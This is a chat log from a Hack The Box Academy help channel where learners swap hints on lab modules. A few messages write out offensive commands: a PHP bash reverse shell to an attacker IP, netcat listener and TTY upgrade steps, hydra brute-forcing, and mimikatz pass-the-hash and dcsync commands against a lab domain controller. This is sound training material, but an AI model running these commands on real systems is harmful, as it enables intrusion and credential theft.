#modules

for what

Business

https://tenor.com/view/sus-suspicious-hmm-hmmmm-hmmm-gif-24729433

New certificate in htb

NICE!!!

good to see you bro

Nice to be back

how have3 things been?

exhausting

but good

Getting your module put together?

I'm almost done with path

you can DM me if you are desperate.

lol no, the response times for communication have been a barrier

Hi guys, im a beginner in the academy, I’ve just accomplished some tier 0 modules and I’m on the « Network Enumeration with Nmap », section « Host discovery » which explains how we can scan if a host is alive with nmap 😄

I don’t understand the question at the end of the module, I’m supposed to guess the operating system of the distant host just with an ICMP echo request… But how ? 😅

Just give me some hints, don’t tell me the answer 😄

@rustic sage the ttl times can point you in the right direction

Oh yes thank you, the response of the ICMP request has a 128 TTL times, that’s a windows system
I didn’t know that TTL times was specific to the host system 😁

thats why we learn. I didnt know until I learned here.

Hello,
Could someone please assist me with predictable reset token section of the Broken authentication module(first question)?

@normal laurel i might be able to help 🙂

Got it nvm

Lol hey Jared, got the answer so it’s kk

nice

Anyone else having issues with the VPN dropping?

I have that issue is I have my vpn going on more than one machine or vm

hey can anyone help I am super new to hack but want to learn how can someone help me do my first machine

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Yeah. I use the VPN on my linux box also. It connects and I'm able to ping the gateway but when running the Nibbles exploit is get this crash

stuck on footprinting MySQL... I can't connect to the server

I have tried installing mysql-server again but it wont work

🤦‍♂️ nvm

what i have noticed is if i have my vm connected, then fire up pwnbox or another vm I have that they take turns communicating. You have to only have one connected to the vpn at a time

crackmapexec doesn't work for me either. enither ncrack or medusa. and yeah, metasploit works fine here

Is that because it's just a subdomain/vhost for the inlanefreight.htb?

Hi there. Have you been able to solve this (ZAP Active scan not finding the critical vulnerability)? I have the same problem. Thanks and greetings

Question 7 for the active directory skills 2 questions is juicy potatoe the way we supposed to be impersonating to get the Administrator flag?

Using Web Proxies

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I need little help related to this question.

Can someone guide me

I tried to fuzz the decoded cookie but but it is just a random 440 character long string

I encoded the decoded payload with base64+hex

in reverse order

hello, did you complete the using web proxies module ?

hi

Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.

anyone knowing what i have to do with this inside the pwnbox

i want to listen on port 80 with netcat for phishing with xss

but i keep getting this error and i dont know how to check which service is running on 80 on my pwnbox

@rugged stag @sly kelp for the question in ZAP Scanner i think the first time i do this i end up manually exploit the vuln but i did scan with zap and zap did find that vuln, hint look for ||command injection|| in zap scan output

for this i recommend you do it in burp the list isn't that long so it isn't going to take too long

I just started the "Intro to AD" module. I'm currently in the "AD terminology" section. There are tons terms that got introduced 😅 . I can understand what they're describing but it's hard to really absorb and memorize them without being able to apply them.

How critical is it to memorize them at this point? Or will I slowly get more familiar with them as I progress through the modules?

Not super critical

That's good to hear 🙏 . "memorization" isn't really my strong suit 😅

The other AD modules are significantly more hands on

Nice! I'll be looking forward to those

Thanks for the inputs!

np

İ figured it out after writing the whole problem on paper i was messing up with payload processing part. İt was double encoding every request.
İ solved it later

Thank You

nice

Question 7 for the active directory skills 2 questions is juicy potatoe the way we supposed to be impersonating to get the Administrator flag?

@fresh wedge dm

For what I read in the chat, you need to ||log off windows and connect again||

i finally did it without reco. bcs when i tried the shutdown /r it tells me that i don't have the rights

i used a reverse shell instead

weird. I just did it and worked. had the rights

hello i m block for an very easy question

👏 going to continue this module. so long! 😂 if you finished it, I maybe will contact you private.

ok np

what's that ?

it is for HTB academy

just ask the question, u don't have to say u have one

Ask with #Module, then #section and #question to make it easier 😉

hi everyone I am still doing the starting point boxes. im on the 4th box (redeemer) and i am trying to do the nmap scan that the walkthrough mentions but it is taking me hours!! It ran over night and it still says 13hrs remaining... anyone have any recommendations to resolve this...??

the nmap scan that its telling me to do is nmap -p- -sV (ip address)

ask this in #starting-point also try rustscan

Are you scanning UDP ports ? if not.. stop the scan and retry it

i dont see the starting-point chatroom...

click this #starting-point

Hey all, I'm having an issue with the Footprinting Medium Lab, if anyone is available for some guidance? I am trying to mount the NFS share, but I keep getting errors that I'm not able to view the mount, even after mounting it as sudo, and trying to change the mount folder permissions, etc.

dm me

hello guys

if i want to practice hacking

what should i do

make a pc or use hacklab from hackthebox or use a vm

when I am installing cifs-utils , I am getting following error

cifs-utils has no installation candidate

The VM has the advantage that you can easily install software. If something goes wrong, you can simply reset the VM to its previous state.

So close to finishing password attacks. Only took a week lol

After long hours on the broken authentication skill assessment it's time to ask for some help. I got some users (more than the two obvious ones) and reduced the rock vocabolary to less than 50 entry. Now I suppose that I miss something somewhere. Any hints?

did you catch the hint about country codes?

also when attempting to get the password you need to set a delay between attempts

I got 4 departments on 5 country.... 43 passwords. I am checking all again... but it takes time due to the 30 second delay every 5 (more or less) login tests

i have no the interface tun0

can someone help

connect to the vpn

the VPN is OK

it is another problem

¯_(ツ)_/¯

sorry i'm not a certified bug bounty hunter so idk what to do

@onyx dust i saw u had pb with ObjectAceType i ran the command with the sid but it doesn't ends and it doesn't give me the ObjectAceType

Guys. I’m at skill assessment of Nessus. Tried to run the scan against the target but looks like it don’t detect it (I’m at the vpn of htb, checked). There is a mention that I’m supposed to log in to ssh, but why? I have my own Nessus

use localhost and teh nessus port

on the shell

its not clickable...😬

I’ve done that, I’m inside Nessus but when running the scans it finds nothing about the target

which module is that?

it should have a premade scan to use

ACL Enumeration

what's the url

Oh wow. I was running my own instead of the IPs one

https://forum.hackthebox.com/t/nessus-skills-assessment-what-is-the-plugin-id-of-the-highest-criticality-vulnerability-for-the-windows-authenticated-scan/257558/3?u=jinn

I got it bro thanks!

Hi, may I ask you if you've been able to solve this? I did the fuzzing on the 32nd character of the MD5 sum with the encoding steps from before (in reverse order) but Burp Intruder only shows 200 response codes. Do you have a tip for me? Am I missing something here? Thanks!

filter this HTB{ in the burp intruder output

Hey, i’m having some trouble on the last question of login brute forcing. When I try to bruteforce the ftp I get an error message saying unknown service.

Here is my command i’m already connected with ssh on the computer. hydra -l g.potter-P harry.potter/rockyou-30.txt ftp://127.0.0.1

@maiden field your command looks right

sec i will DM you

Ok thanks

Thank you. Very much appreciated.

THANK GOD!!! and @vital adder and @west canopy. Passwoed attacks is complete!!

dm me

Does anyone have their own domain name? And if so what are your pros & cons, and regrets what would you do over? . Im primarily looking to build a website as sort of a "business card" for when I get offered IT jobs. Ive tried Hostinger and I that's been not good, and I've looked into Domain.com. (sorry this isn't module related, I just trust your guys opinions over YouTubers)

you can get your domain name for free and you can host your website on github and yes it's very limited but free also you can get free ssl certificate and dns from cloudflare for free and it took me about half an hour to setup a website but that to me is just for fun

That sounds ideal, I'm gonna get googlin

the free domain name and cloudflare stuff i think is already on networkchuck channel the github host part i can't remember where i learn to do that

i think it needs to be -L not -l

no the problem is that i forgot an escape -L is when you are using a file and -l is when you use only one username or password

I couldnt remember which was the list. but in that case you had P and not p 😉

yeah because im using a file.

So its P not p

I read it wrong. I thought you had it the other way around

np

Hey everyone!

On the smtp footprint for the username question the wordlist provided as resource in the module does not match

Can anyone suggest a hint pls?
Thanks a lot!

Already tried with smtp-user-enum and metasploit with 2 different wordlists

🤔

The list is already correct. But as explained in the module, there are servers that take longer for a response.

I got with ||nmap smtp-enum-users a list of 10 users|| but those don’t work

I will try increasing the query timeout

Thanks @acoustic owl

From yesterday I was stating I was having problems running waybackurls from the Information Gathering nodule. I have figured out that I have to run it like this.... ~/go/bin/waybackurls -dates https://amazon.com > waybackurls.txt

Got it !

anyone who has done the xss module that can help me? the xss works but i have difficulty intercepting

🤫

Hello, anyone who can give me a hint on the "Documentation and Reporting" Skills Assessment? Based on the provided artifacts, I have currently no idea how to move forward...

I'm trying to understand how this reverse php shell works <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>

so it is executing the bash shell binary and redirects the output to a tcp connection on port 443 ?

Does it mean that I need to open a connection on port 443 to get access to a reverse shell launched by this line in the attacked machine ?

yes, you need to have a listener running on that port. (or whatever port you specify)

Thanks !

Hey am curious about the dnsadmin step on the windows priv esc module I was able to get the dll to make me a domain admin, but I wasn't able to directly access anything (or follow the guide to reg delete some things to be able to start up the dns server again) because of access denied privs etc. even though I right clicked and ran as administrator. I was able to get past this in some other way but is this normal behavior? I did not have access to the administrator's folder on the server as a domain admin, nor did I have access to use commands like reg

I fought hard to get a reverse shell instead but it never worked for me 😢

Hi Kvesta, have you been able to solve this? I'm having the same problem.

What if the DLL would not add you to the admin group, but would open a reverse shell instead?

so, I tried that and it did not work. It didn't give me a shell, but I'm still really new to this so I might have just given a bad payload. I tried though

dm me if you want

In the XSS module.. it shows only very basic XSS. For the exam, should you be able to do 'advanced' XSS payloads?

You just need to understand all that is shown in the modules. The exam only requires things that were explained in the modules.

Hello guys, I’m stuck in the « network enumeration with nmap » module, at the Firewall and IDS/IPS Evasion - Merdium Lab…
I’m supposed to submit the DNS server version of the target… the target use the Google DNS, the target has the 53/tcp port filtered… I tried to open the port from a different source Ip, from another source port… but I’m stuck here for a few hours now 😅
Can someone help me with a few hints ? 😁

ahw okay, Thanks for clarifying!

think about what protocol DNS uses by default

You mean UDP ? I’ve seen that the port 53/udp is open, I will try this way thank you

Hello everybody 🙂 I just solved sqlmap essentials Attack Tuning case#6. It was clear to me, that the exercise wants me to use the --prefix/--sufix switches. Is there any better why than to just try all kinds of combinations I can come up with? In theory the dev could use a arbitrary amount of duble quotes, back ticks, single quotes and parenthesis, correct?

Could I get some assistance with the Information Security Foundations pathway? I'm sure i'm answering a question right however it's not accepting the answer

I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. Can't get the answer for question 3. I pivoted into the second host ran ipconfig and found the second network interface, but I pinged every host on the network and got nothing. I tried using cmd and powershell, but nothing... Is there something I should be doing differently? I'm so lost.

feel free to dm me

Which module and section do you need help with?

Hi, I’m on the last section of the « network enumeration with nmap » module, the hard lab
Do you know which service the client is talking about ? The hint mentioned that they require a large amounts of data, so I though about MySQL but the 3306 port is closed on the target… I need help 😢😅

There is not only MySQL 😉
Have you found a port?

@acoustic owl https://academy.hackthebox.com/module/87/section/906

the question is what does linux pam stand for, im inputting pluggable authentication module and its still giving me an error: incorrect answer

Check if you have a space in front or behind.

|| https://en.wikipedia.org/wiki/Linux_PAM ||

@acoustic owl i have, i've copy pasted exactly from wikiipedia and still no go

reload the site and try then again

Here is the nmap « top-ports=20 » output of the target… I don’t see any ports that have anything to do with data manipulation… maybe I should look for other ports ?

Exactly.
Look again in the module. There you will be shown which port could be meant 😉

Thanks I will look again 🙌🏻

If you get stuck, write me a DM

hello friends

Hello 😄 I'm having fun learning CBBH, I find well designed even for a noob like me, I like the way that we practice all the learning paths. Aside of that, I feel that I would like to have suggested boxes related to the chapters we learn.

After you complete a module they give a list of related boxes i believe

is anybody here a pentester in real life for a job?

well theres no shortage of hacking opportunites

you're telling me haha 😉

but i meant for a paycheck and i was jw how much like htb content is it

well most og the HTB content creators are profesional pen testers or have had expereince doing so. So I would think yes . They base alot of boxes and modules from their real life experiences,

oh. i wonder because this tweet https://twitter.com/sno0ose/status/1480786831272824832 makes it seem like the htb content is different

well ya htb doesnt cover every aspect or every scenario and technology. You can be very specialized focusing on particular technologies and environments. Phones, small networks, corporate networks, military, etc. Some different specialized knowledge sets and programs with each. Technically hacking methodology and philosophy could be applied to anything .

not just I.T and computing

I need a nudge for Password Attacks | Active Directory Attacks & NTDS.dit

not alot of entry level positions but guess you just haft to grind with education and maybe little dark web work. Til all of a sudden your a master? But things like HTB provide legal and ethical ways to practice and develop skills,

what question are you on?

darkweb work?

there is no darkweb work on dread

The third

at least that's what /u/Becky told me

I'm hoping the hint isn't misleading me

the hint is for the pwl

fasttrack password list

oh I thought the hint was referring to using --ntds on crackmap

make a username list with username anarchy or

https://github.com/urbanadventurer/username-anarchy

thanks

then try those names with that password list from the hint. you should get the answer

https://en.wikipedia.org/wiki/Deep_web

yeah ?

what work are you talking about it's mostly drug addicts

on the reddit of tor, called dread, there is no work -- at least that's what i hear from /u/Becky

https://en.wikipedia.org/wiki/Dark_web

ok

nobody hiring out there they only want u to phish icloud

¯_(ツ)_/¯

you can see the user becky on the versus subdreddit talking about baby formula before the united states congress

versus the one that was raided

but that's for another channel or DM i think

i'm here 4 the modules

Theres actually alot of jobs but they need very advanced level of knowledge and skill.

very little entry level stuff

ah well. maybe that guy from twitter can post some listings there or something, then.

Executing SQL command.. but it doesn't work
show tables; i remember a kind of super command need to be added first like <super> show tables; i just forget
please help

show databases;

use database;

[-] ERROR(ARCHETYPE): Line 1: Could not find stored procedure 'show'.
SQL> 

oh mssql?

yes

https://stackoverflow.com/questions/175415/how-do-i-get-list-of-all-tables-in-a-database-using-tsql

does tht work 4 u?

@grizzled dune apparently we were both blind from scrolling, here are the Academy channels 😄

I found out that i can execute cmd command in the SQL

thanks mn

oh

yeah

How the hell did we both not see these channels lol

Idk

So where is it?

This is the channel to discuss modules, and there are other channels for other sections of Academy

Perhaps I am blind

It's under the category HTB: ACADEMY on the left

Oh

We are here in academic

Exactly, this is the #modules channel

Lol

😄

Well I’m blind

Sorry! Me too apparently

Oof

hey! Could someone please help me with Weak Brute Force module Q#2? Im stuck and no sure what else to try

nevermind, Got it

Noice 🙂

Hey all, maybe someone can help me with this: I'm trying to setup a fully interactive tty in a reverse shell.

Here's the commands I've run:
(On host) nc -lvp 9443
(On remote) curl http://ip:port/link/to/image.php
(On host) python3 -c 'import pty; pty.spawn("/bin/bash")'

From there, I followed this (https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic) to try and get tab completion

(On host) ctrl+Z
(On host) echo $TERM
(On host) stty -a
(On host) stty raw -echo
(On host) fg
(On host) reset

The guide indicates that I should now being seeing the reverse shell again. I don't. When I hit enter it shows ^M

I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. I know I need to get the password for vfrank but nothing I've done works. I've transferred over mimikatz and I got his NTLM hash, but I can't crack it with hashcat. I'm at my wits end, need some help. Can anyone give me a hint?

What wordlist are you using?

@modest token i was able to get cleartext password via mimikatz 🙂

Ohhh

Nice

sec i will dm!

For the user ||vfrank||? What command did u use?

Take it to dm 🙂

Hey peeps, I am on the stack based buffer overflow - Windows (module/89/section/946) ... I am following the instructions to convert the pattern text file to a .wav file. However, when using IDLE to run the python code to generate the file I am getting this message. Any idea why this is the case?

Python is very picky with indentation

That red section.. remove it.. it's a load of spaces or something

Make sure indentation is consistent, no mixing of tabs or spaces

I did not indent, it was immediately next line, I even tried putting them in the same line and I still get the message

That great big red line - it's likely a load of spaces or tabs

Try deleting it

did that and it brings the next line up then when I press enter to keep it consistent I get the same message. I am (at least I hope so) copying the instructions on the module exactly

Well gotta be something to do with indentation, that's clear, not sure what to say

thanks, will try to mess around and see whats up

But yeah.. that big red bar looks like some trailing spaces or tabs on line 4, after f:

for anyone who might be wondering what the answer is:
If you are using zsh (ps -p $$)

stty raw -echo; fg
[enter]
[enter]

Follow this with the commands listed in the guide linked.

Hey could anyone give me a quick nudge with the Footprinting Medium Lab? I am mounting the NFS Share, but getting Access Denied when attempting to access the directory inside.

@vale salmon sure DM me 🙂

Could someone help with File Upload Attacks -> Type Filters?
Everything I can upload comes back with an error from the server when I try to access the uploaded file saying the uploaded file contains errors and cannot be displayed.

can someone help me with vhost fuzzing (information gathering - web edition)

maybe lol
Whats the question

for all of the flag you can just use gobuster with ||subdomains-top1million-110000.txt|| or something smaller

what payload and file name did you use?

It looks like all .php are blocked, so I tried the others in the seclists list (.phar, .pht phtm phtml)
those all come up as unable to load on the server though

for the filename
For the payload I tried the php webshell with a GIF and JPEG magic byte

i'm using the 5000 version of that list with ffuf now and it's doing like 2 requests a second instead of like 200 xD

first try with just the jpg magic number and use ||.phar|| extension with ||.jpg|| but swap the extension in burp when upload

Sorry can I dm screenshot? I think I'm doing that, but I might be missing something

sure

if i'm going gobuster on my pwnbox i get like 50 requests a second but if i run the same command on my machine with the vpn i still get like 10 requests a second so not that slow and didn't use ffuf that much so i can't if it's the tool that slow or the internet

so i think there's a problem with my /etc/host but i can't figure out what it is lol

can i dm you?

sure

try switching to root acc, 1. sudo su then 2. try mount -t nfs ip:/{sharename } /{dir_ you_created}

So I went ahead and tried to create the file, using the same method I did previously and this time it worked! When I run it I do get a IDLE shell pop up saying "Restart: C:\Users...\win32bof_exploit.py" ... Now am I not suppose to see the pattern.wav file on the desktop? because I dont see any new file added.

in Password attack module are we supposed to perform privilege escalation in any section, as I am stuck in two sections where root password is needed
or maybe I am overlooking something

Im stuck on the same part. Can I DM you?

sure

In which section and on which question are you stuck?

I am stuck on Passwd and Archives section
just found the back files for the Passwd section

DM

i'm doing the ssrf module and this snippet for automating exectution keeps giving parse errors. I have tried to run it directly and also as a bash script.I did put in the actual target ip

I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?

dm me

on the AD module, skill assessment 1 i'm blocking on this question

type c:\Users\Administrator\Desktop\flag.txt

i get this flag but now i need to connect to MS01 as ||svc_sql||

Thanks, appreciate the help, I got it figured out

have you tried kerberoasting yet?

yes i have the password

cracked

i have instructions on the forum on how to make a tunnel

one sec

after you make a tunnel u can xfreerdp into it from your attack host using the credentials you got

there is another user in the thread doing it with msfconsole and autoroute

https://forum.hackthebox.com/t/active-directory-skills-assessment-i/257250/48 is the thread if you want to read

but the way i posted is a windows way

where you can just have the luxury of copy pasting stuff into it

no need to setup any listeners or anything

to transfer files between attack and target locations

i'll try that thx

did it work?

the nslookup take forever is this normal ?

u can use same IP as in the command if it's the 172. address

172.16.6.50

not unless u on a box with no dns which happens a lot in these fake environments.

i did the nslookup from teh webshell when i was getting the information

got the rdp connection with the found user. but it's a bit annoying not to find other computers on the network

u only need to go to the dc01 host from there

i like making the rdp tunnels because you can use /pth:$HASH with xfreerdp and it's just nice.

yeah, this time we can crack the hash but it's still good to be able to path the hash

yeah in case u dont have a password or cant crack it, it's nice.

but is this normal that i can't connect using the 2nd user found ?

?

the t***** user?

that's normal. i used mimikatz pass the hash with impersonate for that user

u can do it locally then do the attack as that user

like this mimikatz sekurlsa::pth /user:t* /ntlm:<ntlm> /domain:inlanefreight.local /impersonate

then can do the attack from mimikatz too using lsadump::dcsync

i used all windows exe and rdp tunnels for this one

idk what you're doing

hi everybody , im stuck in Broken Authentication - Bruteforcing Cookies question 1 , i tried decrypting the cookie with base64 + ASCII hex then changing the user htbuser role to admin , superadmin , administrator etc with burpsuite and reverse encoding to generate the cookie but couldn't find the flag , can anyone give me a hint ?

but i got there creds using mimikatz, but when i try to xfreerdp it doesn't work

i may be able to help

Honestly, the killer app of HTB Academy is introducing you to a bunch of tools you never knew existed

i used mimikatz like this after getting admin hash from mimikatz dcsync attack mimikatz # sekurlsa::pth /user:administrator /ntlm:<ntlm> /domain:inlanefreight.local /run:".\psexec.exe /accepteula \\dc01.inlanefreight.local -h cmd.exe" and that's how i spawned the shell

I do disassemblies all the time in my day job but decided to do Intro to Assembly Language anyway, and using GEF in gdb is a gamechanger

https://twitter.com/_hugsy_

it's pronounced GEF

btw

the cmd pop up and then close itself, do u know why ?

no

https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/

you can do a number of things with the admin hash like try evil-winrm from linux

idk why you're experiencing that problem but u can also do as an argument to cmd.exe /c type C:\users\administrator\desktop\flag.txt &&echo&&pause and it will persist

since you know what you're going to do with the cmd anyway u can just pass as an argument

¯_(ツ)_/¯

thx, it didn't worked when i tried with the 2nd user but worked fine with the admin

w00t

could someone help me with this. got stuck for days!!!

module SQL INJECTION FUNDAMENTALS

section query results

why docker.hackthebox.eu?
Use the Target IP

i also tried that.

still same error

Are you connected to the Academy VPN?

what says ifconfig tun0

@spare maple i justed tested on pwnbox and I am able to connect to mysql

may i dm you mate!!

Hi there, anyone who can help me with Upload File Attacks? When i've managed to upload the shell and I want to go to there, it only displayed the php code. Not the shell. I've downloaded the shell from phpbash... I don't get it what I'm doing wrong.

are you sure PHP is installed on your target machine?

Yeah

what's this IP?

when i open it in the firefox browser, it execute half :-p, but can't do anything with it

before you say anything else please tell me what is this machine?

Parrot.

the webserver

Or you need to have the IP?

Chrome

No Firefox sorry

206.189.117.48:31166

Feel free to DM me

Thanks!

if you need help feel free to dm

hey there! Can someone help me in the Password Attacks Module? I'm stuck at the mutated password section

Feel free to DM me

Thank you very much. I've gto it

Hey people. I am having trouble with one task on the Linux Fundamentals. When it says to press Ctrl+W it just closes my tab. Is there a easy way to disable it or ????

Which distro on your VM? Or are you using pwnbox?

pwnbox

remember that PwnBox runs in your browser. Therefore the keyboard shortcuts do not apply there.

For the Password Attacks: Network Services exercise, is there a way to get the username for WinRM without bruteforcing all combinations?

I had to bruteforce all combinations. Some tools/services may allow higher throughput in bruteforcing

For "Password Attacks: Credential Hunting in Linux", I am having trouble bruteforcing the initial foothold to run the local Linux tools. I tried the hint (||Kira:LoveYou1||) and searched Discord history. I also tried the password.list and mutations of LoveYou1. Am I missing something obvious?

@kind flume try looking in your ||mutated password list for mutated versions of "LoveYou1"||

Hey @west canopy can I dm you?

sure

Disregard, got it sorted. ~Working through Nibbles. When I try to sudo the monitor.sh file for privesc to root, it asks me for nibbler's password. Not sure what I'm doing wrong. I've been through this one before and don't remember experiencing this issue.~

I've used every enumeration tool of the Active directory module skill assessment 2 but can't get any user, any help ?

Can I have help with the Assembly Skills Assesment please?

I've added this to the end of my assembly code.

I've removed the movabs, properly assembled and linked it,

Ran it in GEF, the program eventually ends with a SIGSEV; I am unsure how to get the flag --the instructions are a bit confusing

anyone finish attacking common services?

what's the issue?

im a noob and didnt know how to read emails, got it now

thank you

Heyo,
Could someone give me a little nudge for the Web Service and API Attacks Skills Assessment please?

Is information security fundamentals preferred before doing bug bounty path or just Jr Pentester?

If I started over I would do infosec path first

Information security path will give you a foundation that will help you with the other modules

Ok I see thanks

im on the zap scanner module... and i think im stuck... but not completly stuck.. wondering if someone can give me a hint if i show u what i found so far..

I got this far... but not sure where to go next..

trying to find the flag.txt... ive gone through most of the directory's i could find using the ping.php utility... haven't found the file yet so wondering if there is anotehr step and i have to crack that hash

How much of the HTB VIP boxes utilizes web hacking

Like I just wanted to ask

I want to gain advanced web app hacking skills

FFS nm i found it

just step through it until you see the assembled flag in GEF ?

Hmmm that’s what I have been doing

i sent you in DM my loop unrolled xor decryption

step thru that in your debugger

I’ll take a look at it 👍

😎

have you tried to use responder ?

Do advanced HTB boxes require advanced web app hacking skills?

Web penetration testing is very important

I would say most of the boxes in HTB use some sort of web hacking

There is also an increasing trend to move everything to web

Ok

It is a very invaluable skill

So would HTB boxes all build upon bug bounty pathway but go over more advanced?

Like can I gain advanced web hacking skills via HTB?

I want to become a well-rounded hacker but I want to make sure I include web

yes

Nice ok

The bug bounty pathway is very comprehensive

Ok

But does regular HTB VIP go beyond the CBBH pathway?

Yes

CBBH is still a great start tho

For hackthebox machines you are going to want to learn how to do privilege escalation in windows and linux

Also when you start doing boxes don't be afraid to use writeups and IPPSEC at first

HTB is a bit of a learning curve

Ok

If you have any other question lmk

I love answering questions

https://tenor.com/view/cat-smile-happy-cat-gif-25313978

I want to get good at bug hunting. Is practicing IRL good while doing HTB VIP?

So to be honest I have never done bug bounty hunting in real life yet

But I think it would be very helpful

Ok thanks

Hackthebox+Hackthebox academy are great for learning theory

But I don't think anything can beat doing things in real life

Ok

So as soon as I get CBBH certified then I should immediately start bug hunting right?

Your hacking journey is up to you. Once you complete CBBH you will have the necessary skills to be a bug bounty hunter. If it were me, I would start bug hunting afterwards

Ok thanks

I’m just finishing Linux fundamentals path right now

About to do Windows fundamentals

u can hunt bugs for freeeee

just sign up for submission platform like bugcrowd.com

I know but I want to be a competent bug hunter

u dont need a certification

only the training 🙂

Ok

But a certification exam would verify I learned from the training right?

right

get it for the vanity

Ok ya

but u dont need the cert to submit bugs u just need the product of the training

I know

Hi there! Can someone help me with the Predictable Reset Token question1? I have the script to generate tokens using username+time, and have used the epoch ending in 000 as the example suggests, but no luck.

Do any of HTB boxes require Python skills?

you have to use a range between the seconds

Oh yeah, I'm trying with seconds between +-1000 and +-1500, but it didn't work neither

what's taht module name

i forgot

Broken Authentication module

you have to use like 1000.1 1000.2 etc etc

if i remember correctly

Looking at broken auth -> weak bruteforce protections q2, from the task outline it looks like I just need to modify the python script from the last exercise to add another header, but I'm not getting anything
Have I misinterpreted the question?
Cheers

So I’m not sure I’m doing the command right, I’m not, but with module 18 section 75 is asking index number of sudoers file in the etc directory

Command is ls -I /etc/sudoers and it gave me 964110 is the index, what am I missing?

So I should learn Python to practice HTB?

Is Python or scripting a skill I need for advanced boxes?

Is that what this convo is about?

hi i'll send u some code

Hi do I sound silly when I ask how much scripting skills and what languages are good for HTB?

Can I get away with just Python?

At what level do boxes require Python?

With regards to HTB academy, there are some modules that make use of it. Not sure the extent since I'm not yet on those modules. If ever your concern is for the boxes, maybe you can check in the HTB platform related channels.

look in the info category of vulnerabilities highlighted in blue that concern SMB. Can filter some results by filtering for vulnerabilities on port 445

all languages are good. the point is to be able to express yourself with the computer. as long as u can do that u are good. python is good but i just showed someone how to use php to do the python example since it's easier to read and process with the command line 🙂

can anyone help me with this

try to dig for txt records, since the question says it has quotes in it

got it !! thx

solved it by using subbrute and axfr. trick part it to find the nameserver first to make commands working

What about for HTB VIP?

I'm doing the WIndows Privilege Escalation module and up to the Windows Built-in Groups section. The password provided for the svc_backup account doesn't seem to work? I've double-triple checked i'm typing correctly... anyone else had this issue?

I didn't notice a specific channel for VIP. I'm not a VIP though, so I might not have access to it.

But like when in VIP do I start to need languages? How advanced should I be at a given language?

Nevermind, using xfreerdp instead of rdesktop worked for some reason

SQLi fundamentals, ‘using comments’

Q : Login as the user with the id 5 to get the flag.
A : trying to use this query on username field using comment and or statement , and ‘anything’ password.
OR id = 5')--

*login failed, with this error

Executing query: SELECT * FROM logins WHERE (username='OR id = 5')-- ' AND id > 1) AND password = '321fad32ead0f58206147440dc1ca939';

can someone help me with this?

idk because i'm not in vip i'm not even done with htb academy sorry

Ok

@quasi wave I would recommend understanding common programming concepts and being able to obfuscate code.

Ok

Which means you should probably know to code

Is it really necessary? No

Is it very very useful? Yes

So would doing a Python development course be a good idea? At what point should I learn how to code? I want to get it done because I want to be able to write my own hacking tools, etc.

But I don’t want to spread myself thin and I feel like for me just focusing on the fundamentals would make more sense

At what point should I add in Python on top of hacking in your view?

I want to know web hacking, wireless hacking, network hacking, Linux exploitation, Windows Exploitation, social engineering, and OSINT, and maybe desktop app and mobile app hacking (and maybe mobile device exploitation)

But I could go without the maybes

If it’s unrealistic

I’m thinking of being able to hack these things employing Python

If I remove desktop app/mobile app/mobile device hacking from the list

Is that realistic?

I want to also possibly know IoT hacking or something like it

I am interested in learning to code tho

So at what point in HTB does coding become useful?

Also knowing how to exploit Mac would be a huge plus but I don’t have to have it

My favorite hacking tho would be anything that helps with hacking things over the internet

Or at least that’s what I lean towards

Take things one bite at a time. Learning all those right now is an impossible task

If you want to learn how to make your own tools you should take a python course beforehand

I was in in your position a while back as well. I wanted to learn lots of stuff. However, it felt overwhelming so I decided to slow down and focus on the fundamentals first. I'm now going through the academy modules so that I can have a solid base to which to go into the different possible specializations.

I might be a slower path, but I believe it has compounding effects in the long run

It’s a marathon not a sprint

😐

is that the Attacking Common Services - Attacking DNS section? someone i help on that same section found a pornhub subdomain
#modules message

lol yes exactly

i have found 5 questionable subdomains

that one stuck out tho

you mean before learning to make tools or before learning hacking?

Before learning to make tools

right obviously

ok

If I asked you if a specific Python course on Udemy was good for tool building in terms of extensiveness, would you be able to look at the course curriculum and tell me if its an appropriate course?

there are three I am looking at

I think for now the python course on hackthebox academy will be helpful

start there

ok

fair

I mean

However it won't go super deep probably

but lets say for when I need to go super deep

https://docs.python.org/3/ Use this as your reference when you want to go really deep

like I am wondering if Angela Yu's Python course, Colte Steel's Python course, or Tim Buchalka's Python course, is best?

ok thanks

so I don't need a Udemy course?

Not sure.

I learned by fucking around to be honest

I mean I guess I could learn for free

ya for sure

just by making stupid games

ya

everyone learns differently

ok

that worked best for me

But to be honest I don't think making your own tools is super necessary. There are bajillions of programmers who will do the hard work for you

ok

but what would I use Python for in hacking?

because I want to know how to use Python for hacking when necessary or programming in general

also I want to be able to program hardware and electronics in Python

so ya

and automate tasks and maybe make websites in it

something like that

hardware is probably better with c or another integrated language

ok

If you mean microcontrollers etc

ya

C, Rust, Go I think are what you want for that

I think you are asking to learn waaaay to much haha

isn't Python #1 for hacking tho?

no such thing as #1

I also want to automate tasks, do calculations, and use a language for well-rounded hacking skills

hacking just needs automation I think
Do the same thing many times
BAsh might even be better than python depending on what you are doing

What is your endgoal?

You can't learn everything about hacking at once

You got to start slow

I want a language that will help me be better at web hacking, wireless hacking, network hacking, SE, and OSINT

and maybe IoT

but if I had to pick two or three things

web hacking, SE, OSINT

so a language that made me best at hacking websites, social engineering applied to hacking, and OSINT

so ya

Step by step

For these 3 domains you won't be using python too much

ok

what would I use?

web development?

To do web dev?

Don't worry much about programming languages now. Just do the CBBH path

ok

thanks

I'm finishing HTB Academy Linux fundamentals path and LinuxJourney (which is a free website that teaches Linux) and then I'm gonna start learning Windows Fundamentals Path

just using Linux Journey to reinforce Linux concepts

ya

Take your time. It's all about the journey : )

ok

thanks

Be patient persistent and consistent

ok thanks

If you practice hard and smart, you will become an amazing hacker with enough time

thanks

what does "smart" mean in the context of hacking

INstead of trying the same thing over and over again, try to think outside the box

ok thanks

good idea

I agree

Start with CBBH

ok

you mean once I get Linux, Windows, networking, InfoSec fundamentals down?

thanks btw

yesh

ok

no prob

